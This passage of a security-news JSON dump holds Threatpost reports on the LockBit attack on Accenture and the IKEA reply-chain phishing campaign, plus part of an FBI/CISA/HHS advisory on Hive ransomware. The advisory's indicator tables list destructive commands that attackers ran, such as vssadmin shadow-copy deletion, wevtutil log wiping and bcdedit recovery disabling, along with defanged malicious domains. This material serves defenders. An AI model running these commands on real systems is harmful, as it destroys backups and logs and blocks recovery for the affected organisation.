According to a [tweet](<https://twitter.com/HRock/status/1425447533598453760?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1425447533598453760%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Faccenture-confirms-hack-after-lockbit-ransomware-data-leak-threats%2F>) from threat intelligence firm Hudson Rock, the attack compromised 2,500 computers used by employees and partners, leading the firm to suggest that \u201cthis information was certainly used by threat actors.\u201d\n\nIn a [security alert](<https://www.cyber.gov.au/acsc/view-all-content/alerts/lockbit-20-ransomware-incidents-australia>) issued last week, the Australian Cyber Security Centre (ACSC) warned that LockBit 2.0 ransomware attacks against Australian organizations had started to rise last month, and that they were coupled with threats to publish data in what\u2019s known as [double-extortion attacks](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\n\u201cThis activity has occurred across multiple industry sectors,\u201d according to the alert. \u201cVictims have received demands for ransom payments. In addition to the encryption of data, victims have received threats that data stolen during the incidents will be published.\u201d\n\nThe ACSC noted ([PDF](<https://www.cyber.gov.au/sites/default/files/2021-08/2021-006%20ACSC%20Ransomware%20Profile%20-%20Lockbit%202.0.pdf>)) that it\u2019s recently observed LockBit threat actors actively exploiting existing vulnerabilities in the Fortinet FortiOS and FortiProxy products, identified as CVE-2018-13379, in order to gain initial access to specific victim networks. 
That vulnerability, a path-traversal flaw in the SSL VPN, has been exploited in multiple attacks over the years:\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that advanced persistent threat (APT) nation-state actors were actively exploiting it to gain a foothold within networks before moving laterally and carrying out recon, for example.\n\n## Known Vulnerability Exploited?\n\nRon Bradley, vice president of third-party risk-management firm Shared Assessments, told Threatpost on Wednesday that the Accenture incident is \u201ca prime example of the difference between business resiliency and business continuity. Business resiliency is like being in a boxing match: you take a body blow but can continue the fight. Business continuity comes into play when operations have ceased or been severely impaired and you have to make major efforts to recover.\n\n\u201cThis particular example with Accenture is interesting in the fact that it was a known/published vulnerability,\u201d Bradley continued. \u201cIt highlights the importance of making sure systems are properly patched in a timely manner. The ability for Accenture to manage the repercussions of potentially stolen data will be an important lesson for many organizations going forward.\u201d\n\nHitesh Sheth, president and CEO at the cybersecurity firm Vectra, said that all businesses should expect attacks like this, but particularly a global consultancy firm with links to so many companies.\n\n\u201cFirst reports suggest Accenture had data backup protocols in place and moved quickly to isolate affected servers,\u201d he told Threatpost on Wednesday. \u201cIt\u2019s too soon for an outside observer to assess damage. However, this is yet another reminder to businesses to scrutinize security standards at their vendors, partners, and providers. 
Every enterprise should expect attacks like this \u2013 perhaps especially a global consulting firm with links to so many other companies. It\u2019s how you anticipate, plan for and recover from attacks that counts.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T21:56:00", "type": "threatpost", "title": "Accenture Confirms LockBit Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2018-13379"], "modified": "2021-08-11T21:56:00", "id": "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "href": "https://threatpost.com/accenture-lockbit-ransomware-attack/168594/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-30T15:47:49", "description": "As of Friday \u2013 as in, shopping-on-steroids Black Friday \u2013 retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.\n\n[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails \u2013 one of which is replicated below \u2013 that warned employees of the attack, which was targeting the company\u2019s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company\u2019s suppliers and partners.\n\n> \u201cThere is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.\n> \n> \u201cThis means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. It is therefore difficult to detect, for which we ask you to be extra cautious.\u201d \u2013IKEA internal email to employees.\n\nAs of Tuesday morning, the company hadn\u2019t seen any evidence of its customers\u2019 data, or business partners\u2019 data, having been compromised. 
\u201cWe continue to monitor to ensure that our internal defence mechanisms are sufficient,\u201d an IKEA spokesperson said, adding that \u201cActions have been taken to prevent damages\u201d and that \u201ca full-scale investigation is ongoing.\u201d\n\nThe spokesperson said that the company\u2019s \u201chighest priority\u201d is that \u201cIKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.\u201d\n\nIKEA didn\u2019t respond to Threatpost\u2019s queries about whether the attack has been contained or if it\u2019s still ongoing.\n\n## Example Phishing Email\n\nIKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company\u2019s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits. Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)\n\nExample phishing email sent to IKEA employees. Source: BleepingComputer.\n\n## Exchange Server Attacks D\u00e9j\u00e0 Vu?\n\nThe attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. 
The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.\n\nAs security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\nWhat was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. 
The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\nTrend Micro\u2019s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.\n\nTheir conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).\n\nIn the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose \u201cEnable Content\u201d to view a protected file, thus launching the infection chain.\n\nSince IKEA 
hasn\u2019t responded to media inquiries, it\u2019s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to \u201cEnable Content\u201d or \u201cEnable Editing\u201d to view it.\n\nTrend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\n## You Can\u2019t Trust Email from \u2018Someone You Know\u2019\n\nIt\u2019s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads. Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren\u2019t necessarily legitimate and can be downright malicious.\n\n\u201cIf you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,\u201d she told Threatpost via email on Monday. \u201cHowever, IKEA employees are finding out otherwise. 
They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.\u201d\n\nThis attack is \u201cparticularly insidious,\u201d she commented, in that it \u201cseemingly continues a pattern of normal use.\u201d\n\n## No More Ignoring Quarantine\n\nWith such \u201cnormal use\u201d patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.\n\nThus, IKEA\u2019s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:\n\n> \u201cOur email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it\u2019s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.\u201d \u2013IKEA internal email to employees.\n\n## Is Training a Waste of Time?\n\nWith such sneaky attacks as these, is training pointless? 
Some say yes, some say no.\n\nErich Kron, security awareness advocate at KnowBe4, is pro-training, particularly given how damaging these attacks can be.\n\n\u201cCompromised email accounts, especially those from internal email systems with access to an organization\u2019s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,\u201d he told Threatpost via email on Monday. \u201cBecause it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.\n\n\u201cThese sorts of attacks, especially if the attackers can gain access to an executive\u2019s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,\u201d Kron said.\n\nHe suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message. 
\u201cIf it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,\u201d he said.\n\nIn contrast, Christian Espinosa, managing director of Cerberus Sentinel, casts a firm vote for the \u201ctraining is pointless\u201d approach.\n\n\u201cIt should be evident by now that awareness and phishing training is ineffective,\u201d he told Threatpost via email on Monday. \u201cIt\u2019s time we accept \u2018users\u2019 will continuously fall for phishing scams, despite how much \u2018awareness training\u2019 we put them through.\u201d\n\nBut what options do we have? Espinosa suggested that cybersecurity defense playbooks \u201cshould focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the \u2018malware\u2019 would not be whitelisted.\u201d\n\nHe pointed to other industries that have compensated for human factors, such as transportation. \u201cDespite awareness campaigns, the transportation industry realized that many people did not \u2018look\u2019 before turning across traffic at a green light,\u201d Espinosa said. \u201cInstead of blaming the drivers, the industry changed the traffic lights. 
The newer lights prevent drivers from turning across traffic unless there is a green arrow.\u201d\n\nThis change saved thousands of lives, he said, and it\u2019s high time that the cybersecurity industry similarly \u201ctakes ownership.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T21:22:12", 
"type": "threatpost", "title": "IKEA Hit by Email Reply-Chain Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-29T21:22:12", "id": "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "href": "https://threatpost.com/ikea-email-reply-chain-attack/176625/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-12-06T17:07:02", "description": "### Summary\n\nActions to Take Today to Mitigate Cyber Threats from Ransomware:\n\n\u2022 Prioritize remediating [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Enable and enforce multifactor authentication with strong passwords \n\u2022 Close unused ports and remove any application not deemed necessary for day-to-day operations.\n\n_Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. 
Visit [stopransomware.gov](<https://www.cisa.gov/stopransomware>) to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.\n\nFBI, CISA, and HHS encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Victims of ransomware operations should report the incident to their local FBI field office or CISA.\n\nDownload the PDF version of this report: pdf, 852.9 kb.\n\nFor a downloadable copy of IOCs, see AA22-321A.stix (STIX, 43.6 kb).\n\n### Technical Details\n\n_Note: This advisory uses the MITRE ATT&CK\u00ae for Enterprise framework, version 12. See [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v12/matrices/enterprise/>) for all referenced tactics and techniques._\n\nAs of November 2022, Hive ransomware actors have victimized over 1,300 companies worldwide, receiving approximately US$100 million in ransom payments, according to FBI information. Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks. From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).\n\nThe method of initial intrusion will depend on which affiliate targets the network. 
Hive actors have gained initial access to victim networks by using single-factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols [[T1133](<https://attack.mitre.org/versions/v12/techniques/T1133/>)]. In some cases, Hive actors have bypassed multifactor authentication (MFA) and gained access to FortiOS servers by exploiting Common Vulnerabilities and Exposures (CVE) [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>). This vulnerability enables a malicious cyber actor to log in without a prompt for the user\u2019s second authentication factor (FortiToken) when the actor changes the case of the username.\n\nHive actors have also gained initial access to victim networks by distributing phishing emails with malicious attachments [[T1566.001](<https://attack.mitre.org/versions/v12/techniques/T1566/001/>)] and by exploiting the following vulnerabilities against Microsoft Exchange servers [[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/>)]:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) - Microsoft Exchange Server Security Feature Bypass Vulnerability\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) - Microsoft Exchange Server Remote Code Execution Vulnerability\n * [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) - Microsoft Exchange Server Privilege Escalation Vulnerability\n\nAfter gaining access, Hive ransomware attempts to evade detection by executing processes to:\n\n * Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminate those processes to facilitate file encryption [[T1562](<https://attack.mitre.org/versions/v12/techniques/T1562/001/>)].\n * Stop the volume shadow copy services and remove all existing shadow copies via vssadmin on the command line or via PowerShell [[T1059](<https://attack.mitre.org/versions/v12/techniques/T1059/>)] 
[[T1490](<https://attack.mitre.org/versions/v12/techniques/T1490/>)].\n * Delete Windows event logs, specifically the System, Security and Application logs [[T1070](<https://attack.mitre.org/versions/v12/techniques/T1070/>)].\n\nPrior to encryption, Hive ransomware removes virus definitions and disables all portions of Windows Defender and other common antivirus programs in the system registry [[T1112](<https://attack.mitre.org/versions/v12/techniques/T1112/>)].\n\nHive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz [[T1537](<https://attack.mitre.org/versions/v12/techniques/T1537/>)]. In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.\n\nDuring the encryption process, a file named *.key (previously *.key.*) is created in the root directory (C:\\ or /root/). Required for decryption, this key file only exists on the machine where it was created and cannot be reproduced. The ransom note, HOW_TO_DECRYPT.txt is dropped into each affected directory and states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered [[T1486](<https://attack.mitre.org/versions/v12/techniques/T1486/>)]. The ransom note contains a \u201csales department\u201d .onion link accessible through a TOR browser, enabling victim organizations to contact the actors through a live chat panel to discuss payment for their files. However, some victims reported receiving phone calls or emails from Hive actors directly to discuss payment.\n\nThe ransom note also threatens victims that a public disclosure or leak site accessible on the TOR site, \u201cHiveLeaks\u201d, contains data exfiltrated from victim organizations who do not pay the ransom demand (see figure 1 below). 
Additionally, Hive actors have used anonymous file sharing sites to disclose exfiltrated data (see table 1 below).\n\n_Figure 1: Sample Hive Ransom Note_\n\n_Table 1: Anonymous File Sharing Sites Used to Disclose Data_\n\n * https://anonfiles[.]com\n * https://mega[.]nz\n * https://send.exploit[.]in\n * https://ufile[.]io\n * https://www.sendspace[.]com\n * https://privatlab[.]net\n * https://privatlab[.]com\n\nOnce the victim organization contacts Hive actors on the live chat panel, Hive actors communicate the ransom amount and the payment deadline. Hive actors negotiate ransom demands in U.S. dollars, with initial amounts ranging from several thousand to millions of dollars. Hive actors demand payment in Bitcoin.\n\nHive actors have been known to reinfect\u2014with either Hive ransomware or another ransomware variant\u2014the networks of victim organizations who have restored their network without making a ransom payment.\n\n#### **Indicators of Compromise**\n\nThreat actors have leveraged the following IOCs during Hive ransomware compromises. Note: Some of these indicators are legitimate applications that Hive threat actors used to aid in further malicious exploitation. FBI, CISA, and HHS recommend removing any application not deemed necessary for day-to-day operations. 
See tables 2\u20133 below for IOCs obtained from FBI threat response investigations as recently as November 2022.\n\n_Table 2: Known IOCs as of November 2022_\n\n**Known IOCs - Files**\n\n * HOW_TO_DECRYPT.txt typically in directories with encrypted files\n * *.key typically in the root directory, i.e., C:\\ or /root\n * hive.bat\n * shadow.bat\n * asq.r77vh0[.]pw - Server hosted malicious HTA file\n * asq.d6shiiwz[.]pw - Server referenced in malicious regsvr32 execution\n * asq.swhw71un[.]pw - Server hosted malicious HTA file\n * asd.s7610rir[.]pw - Server hosted malicious HTA file\n * Windows_x64_encrypt.dll\n * Windows_x64_encrypt.exe\n * Windows_x32_encrypt.dll\n * Windows_x32_encrypt.exe\n * Linux_encrypt\n * Esxi_encrypt\n\n**Known IOCs \u2013 Events**\n\n * System, Security and Application Windows event logs wiped\n * Microsoft Windows Defender AntiSpyware Protection disabled\n * Microsoft Windows Defender AntiVirus Protection disabled\n * Volume shadow copies deleted\n * Normal boot process prevented\n\n**Known IOCs \u2013 Logged Processes**\n\n * wevtutil.exe cl system\n * wevtutil.exe cl security\n * wevtutil.exe cl application\n * vssadmin.exe delete shadows /all /quiet\n * wmic.exe SHADOWCOPY /nointeractive\n * wmic.exe shadowcopy delete\n * bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\n * bcdedit.exe /set {default} recoveryenabled no\n\n_Table 3: Potential IOC IP Addresses as of November 2022_\n\nNote: Some of these observed IP addresses are more than a year old. 
FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action like blocking.\n\nPotential IOC IP Addresses for Compromise or Exfil: see the downloadable AA22-321A.stix file referenced above for the full list.\n\n#### **MITRE ATT&CK TECHNIQUES**\n\nSee table 4 for all referenced threat actor tactics and techniques listed in this advisory.\n\n_Table 4: Hive Actors ATT&CK Techniques for Enterprise_\n\n_Initial Access_\n\n| Technique Title | ID | Use |\n| --- | --- | --- |\n| External Remote Services | [T1133](<https://attack.mitre.org/versions/v12/techniques/T1133/>) | Hive actors gain access to victim networks by using single-factor logins via RDP, VPN, and other remote network connection protocols. |\n| Exploit Public-Facing Application | [T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/>) | Hive actors gain access to victim networks by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321. |\n| Phishing | [T1566.001](<https://attack.mitre.org/versions/v12/techniques/T1566/001/>) | Hive actors gain access to victim networks by distributing phishing emails with malicious attachments. |\n\n_Execution_\n\n| Technique Title | ID | Use |\n| --- | --- | --- |\n| Command and Scripting Interpreter | [T1059](<https://attack.mitre.org/versions/v12/techniques/T1059/>) | Hive actors look to stop the volume shadow copy services and remove all existing shadow copies via vssadmin on the command line or PowerShell. |\n\n_Defense Evasion_\n\n| Technique Title | ID | Use |\n| --- | --- | --- |\n| Indicator Removal on Host | [T1070](<https://attack.mitre.org/versions/v12/techniques/T1070/>) | Hive actors delete Windows event logs, specifically the System, Security and Application logs. |\n| Modify Registry | [T1112](<https://attack.mitre.org/versions/v12/techniques/T1112/>) | Hive actors set registry values for DisableAntiSpyware and DisableAntiVirus to 1. |\n| Impair Defenses | [T1562](<https://attack.mitre.org/versions/v12/techniques/T1562/001/>) | Hive actors seek processes related to backups, antivirus/anti-spyware, and file copying and terminate those processes to facilitate file encryption. |\n\n_Exfiltration_\n\n| Technique Title | ID | Use |\n| --- | --- | --- |\n| Transfer Data to Cloud Account | [T1537](<https://attack.mitre.org/versions/v12/techniques/T1537/>) | Hive actors exfiltrate data from victims, using a possible combination of Rclone and the cloud storage service Mega.nz. |\n\n_Impact_\n\n| Technique Title | ID | Use |\n| --- | --- | --- |\n| Data Encrypted for Impact | [T1486](<https://attack.mitre.org/versions/v12/techniques/T1486/>) | Hive actors deploy a ransom note HOW_TO_DECRYPT.txt into each affected directory which states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered. |\n| Inhibit System Recovery | [T1490](<https://attack.mitre.org/versions/v12/techniques/T1490/>) | Hive actors look to stop the volume shadow copy services and remove all existing shadow copies via vssadmin on the command line or PowerShell. |\n\n### Mitigations\n\nFBI, CISA, and HHS recommend organizations, particularly in the HPH sector, implement the following to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Hive ransomware:\n\n * Verify Hive actors no longer have access to the network.\n * Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). Consider leveraging a centralized patch management system to automate and expedite the process.\n * Require [phishing-resistant MFA](<https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf>) for as many services as possible\u2014particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.\n * If used, secure and monitor RDP. 
\n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure.\n * After assessing risks, if you deem RDP operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse.\n * If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.\n * Be sure to properly configure devices and enable security features.\n * Disable ports and protocols not used for business purposes, such as RDP Port 3389/TCP.\n * Maintain offline backups of data, and regularly maintain backup and restoration. By instituting this practice, the organization ensures it will not be severely interrupted or left with only irretrievable data.\n * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure. Ensure your backup data is not already infected.\n * Monitor cyber threat reporting regarding the publication of compromised VPN login credentials and change passwords/settings if applicable.\n * Install and regularly update anti-virus or anti-malware software on all hosts.\n * Enable PowerShell Logging including module logging, script block logging and transcription.\n * Install an enhanced monitoring tool such as Sysmon from Microsoft for increased logging.\n * Review the following additional resources. 
\n * The joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * The Cybersecurity and Infrastructure Security Agency-Multi-State Information Sharing & Analysis Center [Joint Ransomware Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>) covers additional best practices and ways to prevent, protect, and respond to a ransomware attack.\n * [StopRansomware.gov](<https://www.cisa.gov/stopransomware>) is the U.S. Government\u2019s official one-stop location for resources to tackle ransomware more effectively.\n\nIf your organization is impacted by a ransomware incident, FBI, CISA, and HHS recommend the following actions.\n\n * **Isolate the infected system**. Remove the infected system from all networks, and disable the computer\u2019s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected.\n * **Turn off other computers and devices**. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.\n * **Secure your backups**. Ensure that your backup data is offline and secure. 
If possible, scan your backup data with an antivirus program to check that it is free of malware.\n\nIn addition, FBI, CISA, and HHS urge all organizations to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.\n\n#### **Preparing for Cyber Incidents**\n\n * **Review the security posture of third-party vendors and those interconnected with your organization**. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * **Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs** under an established security policy.\n * **Document and monitor external remote connections**. Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.\n * **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).\n\n#### **Identity and Access Management**\n\n * **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with [National Institute of Standards and Technology (NIST) standards](<https://pages.nist.gov/800-63-3/>) for developing and managing password policies. 
\n * Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n * Store passwords in hashed format using industry-recognized password managers.\n * Add password user \u201csalts\u201d to shared login credentials.\n * Avoid reusing passwords.\n * Implement multiple failed login attempt account lockouts.\n * Disable password \u201chints.\u201d\n * Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised. \nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n * Require administrator credentials to install software.\n * **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n * **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n * **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n * **Implement time-based access for accounts set at the admin level and higher**. For example, the 